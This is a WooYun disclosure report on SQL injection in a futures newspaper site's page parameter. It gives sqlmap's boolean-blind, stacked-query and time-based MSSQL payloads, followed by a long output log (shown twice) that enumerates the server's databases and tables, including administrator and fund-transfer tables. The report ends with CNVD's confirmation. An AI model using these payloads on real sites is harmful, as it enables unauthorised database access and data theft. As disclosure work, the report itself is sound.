漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0135160
漏洞标题:某期货日报网分站SQL注入
相关厂商:cncert国家互联网应急中心
漏洞作者: 丨小二丶
提交时间:2015-08-21 23:05
修复时间:2015-10-08 10:10
公开时间:2015-10-08 10:10
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-21: 细节已通知厂商并且等待厂商处理中
2015-08-24: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开
简要描述:
某期货日报网出现SQL
详细说明:
期货日报网
http://**.**.**.**/Newspaper/PageNavigate.aspx?nid=1572
sqlmap identified the following injection points with a total of 0 HTTP(s)
sts:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=1572 AND 5700=5700
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: nid=1572; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: nid=1572 WAITFOR DELAY '0:0:5'--
---
[22:49:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[22:49:09] [INFO] fetching database names
[22:49:09] [INFO] fetching number of databases
[22:49:09] [INFO] resumed: 12
[22:49:09] [INFO] resumed: APP_DBQIHUO
[22:49:09] [INFO] resumed: DiplayPlatform
[22:49:09] [INFO] resumed: DP
[22:49:09] [INFO] resumed: master
[22:49:09] [INFO] resumed: model
[22:49:09] [INFO] resumed: msdb
[22:49:09] [INFO] resumed: ShiPan6
[22:49:09] [INFO] resumed: ShiPan7
[22:49:09] [INFO] resumed: ShiPan8
[22:49:09] [INFO] resumed: ShiPan9
[22:49:09] [INFO] resumed: tempdb
[22:49:09] [INFO] resumed: WenHua
[22:49:09] [INFO] fetching tables for databases: APP_DBQIHUO, DP, DiplayPla
, ShiPan6, ShiPan7, ShiPan8, ShiPan9, WenHua, master, model, msdb, tempdb
[22:49:09] [INFO] fetching number of tables for database 'DiplayPlatform'
[22:49:09] [INFO] resumed: 57
[22:49:09] [INFO] resumed: dbo.dt_Adbanner
[22:49:09] [INFO] resumed: dbo.dt_Administrator
[22:49:09] [INFO] resumed: dbo.dt_Advertising
[22:49:09] [INFO] resumed: dbo.dt_Article
[22:49:09] [INFO] resumed: dbo.dt_AutoTradeDate
[22:49:09] [INFO] resumed: dbo.dt_BasicData
[22:49:09] [INFO] resumed: dbo.dt_BeginMoney_M
[22:49:09] [INFO] resumed: dbo.dt_BeginMoney_W
[22:49:09] [INFO] resumed: dbo.dt_Breed
[22:49:09] [INFO] resumed: dbo.dt_BuildHtml
[22:49:09] [INFO] resumed: dbo.dt_Channel
[22:49:09] [INFO] resumed: dbo.dt_ChiCangDetail
[22:49:09] [INFO] resumed: dbo.dt_DayRanking
[22:49:09] [INFO] resumed: dbo.dt_DealDetail
[22:49:09] [INFO] resumed: dbo.dt_DRBreed
[22:49:09] [INFO] resumed: dbo.dt_DREmptyOrMore
[22:49:09] [INFO] resumed: dbo.dt_Fund
[22:49:09] [INFO] resumed: dbo.dt_FundNet
[22:49:09] [INFO] resumed: dbo.dt_ImportFailRecord
[22:49:09] [INFO] resumed: dbo.dt_InOrOut_Money_Details
[22:49:09] [INFO] resumed: dbo.dt_Links
[22:49:09] [INFO] resumed: dbo.dt_Master
[22:49:09] [INFO] resumed: dbo.dt_Menu
[22:49:09] [INFO] resumed: dbo.dt_MonthRanking
[22:49:09] [INFO] resumed: dbo.dt_MRBreed
[22:49:09] [INFO] resumed: dbo.dt_MREmptyOrMore
[22:49:09] [INFO] resumed: dbo.dt_Player
[22:49:09] [INFO] resumed: dbo.dt_ProcessDataRecord
[22:49:09] [INFO] resumed: dbo.dt_Role
[22:49:09] [INFO] resumed: dbo.dt_Role_Menu
[22:49:09] [INFO] resumed: dbo.dt_SystemLog
[22:49:09] [INFO] resumed: dbo.dt_TotalRanking
[22:49:09] [INFO] resumed: dbo.dt_TradeDate
[22:49:09] [INFO] resumed: dbo.dt_TRBreed
[22:49:09] [INFO] resumed: dbo.dt_TREmptyOrMore
[22:49:09] [INFO] resumed: dbo.dt_UnwindingDetail
[22:49:09] [INFO] resumed: dbo.dt_WeekRanking
[22:49:09] [INFO] resumed: dbo.dt_WRBreed
[22:49:09] [INFO] resumed: dbo.dt_WREmptyOrMore
[22:49:09] [INFO] resumed: dbo.vw_Article
[22:49:09] [INFO] resumed: dbo.vw_BasicData
[22:49:09] [INFO] resumed: dbo.vw_ChiCangDetail
[22:49:09] [INFO] resumed: dbo.vw_DayRanking
[22:49:09] [INFO] resumed: dbo.vw_DRBreed
[22:49:09] [INFO] resumed: dbo.vw_DREmptyOrMore
[22:49:09] [INFO] resumed: dbo.vw_FundNet
[22:49:09] [INFO] resumed: dbo.vw_MonthRanking
[22:49:09] [INFO] resumed: dbo.vw_MRBreed
[22:49:09] [INFO] resumed: dbo.vw_MREmptyOrMore
[22:49:09] [INFO] resumed: dbo.vw_ProcessDataRecord
[22:49:09] [INFO] resumed: dbo.vw_Role_Menu
[22:49:09] [INFO] resumed: dbo.vw_TotalRanking
[22:49:09] [INFO] resumed: dbo.vw_TRBreed
[22:49:09] [INFO] resumed: dbo.vw_TREmptyOrMore
[22:49:09] [INFO] resumed: dbo.vw_WeekRanking
[22:49:09] [INFO] resumed: dbo.vw_WRBreed
[22:49:10] [INFO] resumed: dbo.vw_WREmptyOrMore
[22:49:10] [INFO] fetching number of tables for database 'ShiPan8'
[22:49:10] [INFO] resumed: 49
[22:49:10] [INFO] resumed: dbo.dt_BasicData1
[22:49:10] [INFO] resumed: dbo.dt_BasicData2
[22:49:10] [INFO] resumed: dbo.dt_Breed
[22:49:10] [INFO] resumed: dbo.dt_BreedTongJi
[22:49:10] [INFO] resumed: dbo.dt_ChiCangDetail
[22:49:10] [INFO] resumed: dbo.dt_DayRanking1
[22:49:10] [INFO] resumed: dbo.dt_DayRanking2
[22:49:10] [INFO] resumed: dbo.dt_DealDetail
[22:49:10] [INFO] resumed: dbo.dt_DRBreed
[22:49:10] [INFO] resumed: dbo.dt_DRDayNight
[22:49:10] [INFO] resumed: dbo.dt_DREmptyOrMore
[22:49:10] [INFO] resumed: dbo.dt_FutureCompany1
[22:49:10] [INFO] resumed: dbo.dt_FutureCompany2
[22:49:10] [INFO] resumed: dbo.dt_HoldData
[22:49:10] [INFO] resumed: dbo.dt_ImportFailRecord
[22:49:10] [INFO] resumed: dbo.dt_InOrOut_Money_Details
[22:49:10] [INFO] resumed: dbo.dt_MatchType
[22:49:10] [INFO] resumed: dbo.dt_Player1
[22:49:10] [INFO] resumed: dbo.dt_Player2
[22:49:10] [INFO] resumed: dbo.dt_Score1
[22:49:10] [INFO] resumed: dbo.dt_Score2
[22:49:10] [INFO] resumed: dbo.dt_Statistical1
[22:49:10] [INFO] resumed: dbo.dt_Statistical2
[22:49:10] [INFO] resumed: dbo.dt_TimesOpen
[22:49:10] [INFO] resumed: dbo.dt_TimesUnwinding
[22:49:10] [INFO] resumed: dbo.dt_TotalRanking1
[22:49:10] [INFO] resumed: dbo.dt_TotalRanking2
[22:49:10] [INFO] resumed: dbo.dt_TradeDate1
[22:49:10] [INFO] resumed: dbo.dt_TradeDate2
[22:49:10] [INFO] resumed: dbo.dt_TradeDateCheck
[22:49:10] [INFO] resumed: dbo.dt_TRBreed
[22:49:10] [INFO] resumed: dbo.dt_TRDayNight
[22:49:10] [INFO] resumed: dbo.dt_TREmptyOrMore
[22:49:10] [INFO] resumed: dbo.dt_UnwindingDetail
[22:49:10] [INFO] resumed: dbo.vw_BasicData1
[22:49:10] [INFO] resumed: dbo.vw_BasicData2
[22:49:10] [INFO] resumed: dbo.vw_BreedTongJi
[22:49:10] [INFO] resumed: dbo.vw_DealDetail
[22:49:10] [INFO] resumed: dbo.vw_HoldData
[22:49:10] [INFO] resumed: dbo.vw_Player1
[22:49:10] [INFO] resumed: dbo.vw_Player2
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking1
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking11
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking111
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking2
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking22
[22:49:10] [INFO] resumed: dbo.vw_TRBreed
[22:49:10] [INFO] resumed: dbo.vw_TRDayNight
[22:49:10] [INFO] resumed: dbo.vw_TREmptyOrMore
[22:49:10] [INFO] fetching number of tables for database 'ShiPan9'
[22:49:10] [INFO] resumed: 69
[22:49:10] [INFO] resumed: dbo.dt_BasicData1
[22:49:10] [INFO] resumed: dbo.dt_BasicData2
[22:49:10] [INFO] resumed: dbo.dt_Breed
[22:49:10] [INFO] resumed: dbo.dt_BreedOut
[22:49:10] [INFO] resumed: dbo.dt_BreedTongJi
[22:49:10] [INFO] resumed: dbo.dt_ChiCangDetail
[22:49:10] [INFO] resumed: dbo.dt_DayRanking1
[22:49:10] [INFO] resumed: dbo.dt_DayRanking2
[22:49:10] [INFO] resumed: dbo.dt_DealDataOut
[22:49:10] [INFO] resumed: dbo.dt_DealDetail
[22:49:10] [INFO] resumed: dbo.dt_DRBreed
[22:49:10] [INFO] resumed: dbo.dt_DRDayNight
[22:49:10] [INFO] resumed: dbo.dt_DREmptyOrMore
[22:49:10] [INFO] resumed: dbo.dt_ExchangeOut
[22:49:10] [INFO] resumed: dbo.dt_FutureCompany1
[22:49:10] [INFO] resumed: dbo.dt_FutureCompany2
[22:49:10] [INFO] resumed: dbo.dt_HoldData
[22:49:10] [INFO] resumed: dbo.dt_HoldDataOut
[22:49:10] [INFO] resumed: dbo.dt_ImportFailRecord
[22:49:10] [INFO] resumed: dbo.dt_InOrOut_Money_Details
[22:49:10] [INFO] resumed: dbo.dt_OptChiCangDetail
[22:49:10] [INFO] resumed: dbo.dt_OptDealDetail
[22:49:10] [INFO] resumed: dbo.dt_OptExerDetail
[22:49:10] [INFO] resumed: dbo.dt_OptHoldData
[22:49:10] [INFO] resumed: dbo.dt_OptUnwindingDetail
[22:49:10] [INFO] resumed: dbo.dt_Player1
[22:49:10] [INFO] resumed: dbo.dt_Player2
[22:49:10] [INFO] resumed: dbo.dt_ProductData
[22:49:10] [INFO] resumed: dbo.dt_ProductPlayer
[22:49:10] [INFO] resumed: dbo.dt_Score1
[22:49:10] [INFO] resumed: dbo.dt_Score2
[22:49:10] [INFO] resumed: dbo.dt_SignUp1
[22:49:10] [INFO] resumed: dbo.dt_SignUp2
[22:49:10] [INFO] resumed: dbo.dt_Statistical1
[22:49:10] [INFO] resumed: dbo.dt_Statistical2
[22:49:10] [INFO] resumed: dbo.dt_TimesOpen
[22:49:10] [INFO] resumed: dbo.dt_TimesUnwinding
[22:49:10] [INFO] resumed: dbo.dt_TotalRanking1
[22:49:10] [INFO] resumed: dbo.dt_TotalRanking2
[22:49:10] [INFO] resumed: dbo.dt_TradeDate1
[22:49:10] [INFO] resumed: dbo.dt_TradeDate2
[22:49:10] [INFO] resumed: dbo.dt_TradeDateCheck
[22:49:10] [INFO] resumed: dbo.dt_TRBreed
[22:49:10] [INFO] resumed: dbo.dt_TRDayNight
[22:49:10] [INFO] resumed: dbo.dt_TREmptyOrMore
[22:49:10] [INFO] resumed: dbo.dt_UnwindingDetail
[22:49:10] [INFO] resumed: dbo.vw_BasicData1
[22:49:10] [INFO] resumed: dbo.vw_BasicData2
[22:49:10] [INFO] resumed: dbo.vw_BreedTongJi
[22:49:10] [INFO] resumed: dbo.vw_CMETotalRanking1
[22:49:10] [INFO] resumed: dbo.vw_CMETotalRanking2
[22:49:10] [INFO] resumed: dbo.vw_DealDataOut
[22:49:10] [INFO] resumed: dbo.vw_DealDetail
[22:49:10] [INFO] resumed: dbo.vw_ExchangeBreedOut
[22:49:10] [INFO] resumed: dbo.vw_HoldData
[22:49:10] [INFO] resumed: dbo.vw_HoldDataOut
[22:49:10] [INFO] resumed: dbo.vw_Player1
[22:49:10] [INFO] resumed: dbo.vw_Player2
[22:49:10] [INFO] resumed: dbo.vw_ProductData
[22:49:10] [INFO] resumed: dbo.vw_SignUp1
[22:49:10] [INFO] resumed: dbo.vw_SignUp2
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking1
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking11
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking111
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking2
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking22
[22:49:10] [INFO] resumed: dbo.vw_TRBreed
[22:49:10] [INFO] resumed: dbo.vw_TRDayNight
[22:49:10] [INFO] resuming partial value: dbo.vw_TREmpty
漏洞证明:
http://**.**.**.**/Newspaper/PageNavigate.aspx?nid=1572
sqlmap identified the following injection points with a total of 0 HTTP(s)
sts:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=1572 AND 5700=5700
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: nid=1572; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: nid=1572 WAITFOR DELAY '0:0:5'--
---
[22:49:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[22:49:09] [INFO] fetching database names
[22:49:09] [INFO] fetching number of databases
[22:49:09] [INFO] resumed: 12
[22:49:09] [INFO] resumed: APP_DBQIHUO
[22:49:09] [INFO] resumed: DiplayPlatform
[22:49:09] [INFO] resumed: DP
[22:49:09] [INFO] resumed: master
[22:49:09] [INFO] resumed: model
[22:49:09] [INFO] resumed: msdb
[22:49:09] [INFO] resumed: ShiPan6
[22:49:09] [INFO] resumed: ShiPan7
[22:49:09] [INFO] resumed: ShiPan8
[22:49:09] [INFO] resumed: ShiPan9
[22:49:09] [INFO] resumed: tempdb
[22:49:09] [INFO] resumed: WenHua
[22:49:09] [INFO] fetching tables for databases: APP_DBQIHUO, DP, DiplayPla
, ShiPan6, ShiPan7, ShiPan8, ShiPan9, WenHua, master, model, msdb, tempdb
[22:49:09] [INFO] fetching number of tables for database 'DiplayPlatform'
[22:49:09] [INFO] resumed: 57
[22:49:09] [INFO] resumed: dbo.dt_Adbanner
[22:49:09] [INFO] resumed: dbo.dt_Administrator
[22:49:09] [INFO] resumed: dbo.dt_Advertising
[22:49:09] [INFO] resumed: dbo.dt_Article
[22:49:09] [INFO] resumed: dbo.dt_AutoTradeDate
[22:49:09] [INFO] resumed: dbo.dt_BasicData
[22:49:09] [INFO] resumed: dbo.dt_BeginMoney_M
[22:49:09] [INFO] resumed: dbo.dt_BeginMoney_W
[22:49:09] [INFO] resumed: dbo.dt_Breed
[22:49:09] [INFO] resumed: dbo.dt_BuildHtml
[22:49:09] [INFO] resumed: dbo.dt_Channel
[22:49:09] [INFO] resumed: dbo.dt_ChiCangDetail
[22:49:09] [INFO] resumed: dbo.dt_DayRanking
[22:49:09] [INFO] resumed: dbo.dt_DealDetail
[22:49:09] [INFO] resumed: dbo.dt_DRBreed
[22:49:09] [INFO] resumed: dbo.dt_DREmptyOrMore
[22:49:09] [INFO] resumed: dbo.dt_Fund
[22:49:09] [INFO] resumed: dbo.dt_FundNet
[22:49:09] [INFO] resumed: dbo.dt_ImportFailRecord
[22:49:09] [INFO] resumed: dbo.dt_InOrOut_Money_Details
[22:49:09] [INFO] resumed: dbo.dt_Links
[22:49:09] [INFO] resumed: dbo.dt_Master
[22:49:09] [INFO] resumed: dbo.dt_Menu
[22:49:09] [INFO] resumed: dbo.dt_MonthRanking
[22:49:09] [INFO] resumed: dbo.dt_MRBreed
[22:49:09] [INFO] resumed: dbo.dt_MREmptyOrMore
[22:49:09] [INFO] resumed: dbo.dt_Player
[22:49:09] [INFO] resumed: dbo.dt_ProcessDataRecord
[22:49:09] [INFO] resumed: dbo.dt_Role
[22:49:09] [INFO] resumed: dbo.dt_Role_Menu
[22:49:09] [INFO] resumed: dbo.dt_SystemLog
[22:49:09] [INFO] resumed: dbo.dt_TotalRanking
[22:49:09] [INFO] resumed: dbo.dt_TradeDate
[22:49:09] [INFO] resumed: dbo.dt_TRBreed
[22:49:09] [INFO] resumed: dbo.dt_TREmptyOrMore
[22:49:09] [INFO] resumed: dbo.dt_UnwindingDetail
[22:49:09] [INFO] resumed: dbo.dt_WeekRanking
[22:49:09] [INFO] resumed: dbo.dt_WRBreed
[22:49:09] [INFO] resumed: dbo.dt_WREmptyOrMore
[22:49:09] [INFO] resumed: dbo.vw_Article
[22:49:09] [INFO] resumed: dbo.vw_BasicData
[22:49:09] [INFO] resumed: dbo.vw_ChiCangDetail
[22:49:09] [INFO] resumed: dbo.vw_DayRanking
[22:49:09] [INFO] resumed: dbo.vw_DRBreed
[22:49:09] [INFO] resumed: dbo.vw_DREmptyOrMore
[22:49:09] [INFO] resumed: dbo.vw_FundNet
[22:49:09] [INFO] resumed: dbo.vw_MonthRanking
[22:49:09] [INFO] resumed: dbo.vw_MRBreed
[22:49:09] [INFO] resumed: dbo.vw_MREmptyOrMore
[22:49:09] [INFO] resumed: dbo.vw_ProcessDataRecord
[22:49:09] [INFO] resumed: dbo.vw_Role_Menu
[22:49:09] [INFO] resumed: dbo.vw_TotalRanking
[22:49:09] [INFO] resumed: dbo.vw_TRBreed
[22:49:09] [INFO] resumed: dbo.vw_TREmptyOrMore
[22:49:09] [INFO] resumed: dbo.vw_WeekRanking
[22:49:09] [INFO] resumed: dbo.vw_WRBreed
[22:49:10] [INFO] resumed: dbo.vw_WREmptyOrMore
[22:49:10] [INFO] fetching number of tables for database 'ShiPan8'
[22:49:10] [INFO] resumed: 49
[22:49:10] [INFO] resumed: dbo.dt_BasicData1
[22:49:10] [INFO] resumed: dbo.dt_BasicData2
[22:49:10] [INFO] resumed: dbo.dt_Breed
[22:49:10] [INFO] resumed: dbo.dt_BreedTongJi
[22:49:10] [INFO] resumed: dbo.dt_ChiCangDetail
[22:49:10] [INFO] resumed: dbo.dt_DayRanking1
[22:49:10] [INFO] resumed: dbo.dt_DayRanking2
[22:49:10] [INFO] resumed: dbo.dt_DealDetail
[22:49:10] [INFO] resumed: dbo.dt_DRBreed
[22:49:10] [INFO] resumed: dbo.dt_DRDayNight
[22:49:10] [INFO] resumed: dbo.dt_DREmptyOrMore
[22:49:10] [INFO] resumed: dbo.dt_FutureCompany1
[22:49:10] [INFO] resumed: dbo.dt_FutureCompany2
[22:49:10] [INFO] resumed: dbo.dt_HoldData
[22:49:10] [INFO] resumed: dbo.dt_ImportFailRecord
[22:49:10] [INFO] resumed: dbo.dt_InOrOut_Money_Details
[22:49:10] [INFO] resumed: dbo.dt_MatchType
[22:49:10] [INFO] resumed: dbo.dt_Player1
[22:49:10] [INFO] resumed: dbo.dt_Player2
[22:49:10] [INFO] resumed: dbo.dt_Score1
[22:49:10] [INFO] resumed: dbo.dt_Score2
[22:49:10] [INFO] resumed: dbo.dt_Statistical1
[22:49:10] [INFO] resumed: dbo.dt_Statistical2
[22:49:10] [INFO] resumed: dbo.dt_TimesOpen
[22:49:10] [INFO] resumed: dbo.dt_TimesUnwinding
[22:49:10] [INFO] resumed: dbo.dt_TotalRanking1
[22:49:10] [INFO] resumed: dbo.dt_TotalRanking2
[22:49:10] [INFO] resumed: dbo.dt_TradeDate1
[22:49:10] [INFO] resumed: dbo.dt_TradeDate2
[22:49:10] [INFO] resumed: dbo.dt_TradeDateCheck
[22:49:10] [INFO] resumed: dbo.dt_TRBreed
[22:49:10] [INFO] resumed: dbo.dt_TRDayNight
[22:49:10] [INFO] resumed: dbo.dt_TREmptyOrMore
[22:49:10] [INFO] resumed: dbo.dt_UnwindingDetail
[22:49:10] [INFO] resumed: dbo.vw_BasicData1
[22:49:10] [INFO] resumed: dbo.vw_BasicData2
[22:49:10] [INFO] resumed: dbo.vw_BreedTongJi
[22:49:10] [INFO] resumed: dbo.vw_DealDetail
[22:49:10] [INFO] resumed: dbo.vw_HoldData
[22:49:10] [INFO] resumed: dbo.vw_Player1
[22:49:10] [INFO] resumed: dbo.vw_Player2
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking1
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking11
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking111
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking2
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking22
[22:49:10] [INFO] resumed: dbo.vw_TRBreed
[22:49:10] [INFO] resumed: dbo.vw_TRDayNight
[22:49:10] [INFO] resumed: dbo.vw_TREmptyOrMore
[22:49:10] [INFO] fetching number of tables for database 'ShiPan9'
[22:49:10] [INFO] resumed: 69
[22:49:10] [INFO] resumed: dbo.dt_BasicData1
[22:49:10] [INFO] resumed: dbo.dt_BasicData2
[22:49:10] [INFO] resumed: dbo.dt_Breed
[22:49:10] [INFO] resumed: dbo.dt_BreedOut
[22:49:10] [INFO] resumed: dbo.dt_BreedTongJi
[22:49:10] [INFO] resumed: dbo.dt_ChiCangDetail
[22:49:10] [INFO] resumed: dbo.dt_DayRanking1
[22:49:10] [INFO] resumed: dbo.dt_DayRanking2
[22:49:10] [INFO] resumed: dbo.dt_DealDataOut
[22:49:10] [INFO] resumed: dbo.dt_DealDetail
[22:49:10] [INFO] resumed: dbo.dt_DRBreed
[22:49:10] [INFO] resumed: dbo.dt_DRDayNight
[22:49:10] [INFO] resumed: dbo.dt_DREmptyOrMore
[22:49:10] [INFO] resumed: dbo.dt_ExchangeOut
[22:49:10] [INFO] resumed: dbo.dt_FutureCompany1
[22:49:10] [INFO] resumed: dbo.dt_FutureCompany2
[22:49:10] [INFO] resumed: dbo.dt_HoldData
[22:49:10] [INFO] resumed: dbo.dt_HoldDataOut
[22:49:10] [INFO] resumed: dbo.dt_ImportFailRecord
[22:49:10] [INFO] resumed: dbo.dt_InOrOut_Money_Details
[22:49:10] [INFO] resumed: dbo.dt_OptChiCangDetail
[22:49:10] [INFO] resumed: dbo.dt_OptDealDetail
[22:49:10] [INFO] resumed: dbo.dt_OptExerDetail
[22:49:10] [INFO] resumed: dbo.dt_OptHoldData
[22:49:10] [INFO] resumed: dbo.dt_OptUnwindingDetail
[22:49:10] [INFO] resumed: dbo.dt_Player1
[22:49:10] [INFO] resumed: dbo.dt_Player2
[22:49:10] [INFO] resumed: dbo.dt_ProductData
[22:49:10] [INFO] resumed: dbo.dt_ProductPlayer
[22:49:10] [INFO] resumed: dbo.dt_Score1
[22:49:10] [INFO] resumed: dbo.dt_Score2
[22:49:10] [INFO] resumed: dbo.dt_SignUp1
[22:49:10] [INFO] resumed: dbo.dt_SignUp2
[22:49:10] [INFO] resumed: dbo.dt_Statistical1
[22:49:10] [INFO] resumed: dbo.dt_Statistical2
[22:49:10] [INFO] resumed: dbo.dt_TimesOpen
[22:49:10] [INFO] resumed: dbo.dt_TimesUnwinding
[22:49:10] [INFO] resumed: dbo.dt_TotalRanking1
[22:49:10] [INFO] resumed: dbo.dt_TotalRanking2
[22:49:10] [INFO] resumed: dbo.dt_TradeDate1
[22:49:10] [INFO] resumed: dbo.dt_TradeDate2
[22:49:10] [INFO] resumed: dbo.dt_TradeDateCheck
[22:49:10] [INFO] resumed: dbo.dt_TRBreed
[22:49:10] [INFO] resumed: dbo.dt_TRDayNight
[22:49:10] [INFO] resumed: dbo.dt_TREmptyOrMore
[22:49:10] [INFO] resumed: dbo.dt_UnwindingDetail
[22:49:10] [INFO] resumed: dbo.vw_BasicData1
[22:49:10] [INFO] resumed: dbo.vw_BasicData2
[22:49:10] [INFO] resumed: dbo.vw_BreedTongJi
[22:49:10] [INFO] resumed: dbo.vw_CMETotalRanking1
[22:49:10] [INFO] resumed: dbo.vw_CMETotalRanking2
[22:49:10] [INFO] resumed: dbo.vw_DealDataOut
[22:49:10] [INFO] resumed: dbo.vw_DealDetail
[22:49:10] [INFO] resumed: dbo.vw_ExchangeBreedOut
[22:49:10] [INFO] resumed: dbo.vw_HoldData
[22:49:10] [INFO] resumed: dbo.vw_HoldDataOut
[22:49:10] [INFO] resumed: dbo.vw_Player1
[22:49:10] [INFO] resumed: dbo.vw_Player2
[22:49:10] [INFO] resumed: dbo.vw_ProductData
[22:49:10] [INFO] resumed: dbo.vw_SignUp1
[22:49:10] [INFO] resumed: dbo.vw_SignUp2
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking1
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking11
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking111
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking2
[22:49:10] [INFO] resumed: dbo.vw_TotalRanking22
[22:49:10] [INFO] resumed: dbo.vw_TRBreed
[22:49:10] [INFO] resumed: dbo.vw_TRDayNight
[22:49:10] [INFO] resuming partial value: dbo.vw_TREmpty
修复方案:
版权声明:转载请注明来源 丨小二丶@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-08-24 10:08
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT发给国家中心,由其后续协调网站管理单位处置
最新状态:
暂无